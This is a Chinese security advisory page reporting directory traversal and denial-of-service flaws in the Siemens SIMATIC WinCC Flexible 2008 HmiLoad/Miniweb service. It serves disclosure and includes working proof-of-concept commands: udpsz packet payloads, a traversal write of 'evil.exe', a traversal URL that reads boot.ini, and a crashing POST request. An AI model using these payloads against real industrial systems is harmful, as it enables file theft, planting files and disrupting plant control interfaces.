安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Siemens SIMATIC WinCC Flexible HMI Miniweb多个安全漏洞
发布日期:
2011-11-30
更新日期:
2011-12-01
受影响系统:
Siemens SIMATIC WinCC Flexible 2008
描述:
WinCC flexible是用在一些机器或流程应用中的人机接口。HmiLoad是手动添加的单独工具。
Transfer模式中监听在端口4410的HmiLoad在实现上存在两个安全漏洞,恶意用户可利用这些漏洞泄露敏感信息并造成拒绝服务。
1)在处理HTTP GET请求时,Miniweb.exe中存在输入过滤错误,通过Web请求进行目录遍历攻击可下载任意文件;
2)在处理HTTP POST请求时,Miniweb.exe中存在输入过滤错误,通过Web请求中的特制内容可使进程崩溃。
<*来源:Luigi Auriemma (
aluigi@pivx.com
)
链接:
http://aluigi.altervista.org/adv/winccflex_1-adv.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Luigi Auriemma (
aluigi@pivx.com
)提供了如下测试方法:
http://aluigi.org/testz/udpsz.zip
A]
udpsz -C "0004 02 00 00 00 ffffffff" -b a -T SERVER 2308 2+0x400
or
udpsz -C "0004 03 00 00 00 00000000 00000000 00000000 00000000 00000000 ffffffff" -b a -T SERVER 2308 2+0x400
and so on, alternatively:
udpsz -C "0004" -b 0xff -X 2 8 l 1 -l 0 -T SERVER 2308 2+0x400
B]
udpsz -C "0004 03" 0 -C "01000000 80000000" 0x16 -c ".\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0e\0v\0i\0l\0.\0e\0x\0e\0" 0x1e -T SERVER 2308 2+0x400
C]
udpsz -C "0004 28" -T SERVER 2308 2+0x400
udpsz -C "0004 21" -T SERVER 2308 2+0x400
udpsz -C "0004 22" -T SERVER 2308 2+0x400
udpsz -C "0004 03" 0 -C "ffffffff" 0x16 -T SERVER 2308 2+0x400
D]
http://aluigi.org/mytoolz/mydown.zip
mydown
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
E]
udpsz -c "POST \xfa\x01\x01\x01\x45\x40\x40\x41 HTTP/1.0\r\n\r\n" -T SERVER 80 -1
建议:
厂商补丁:
Siemens
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx
浏览次数:
3098
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客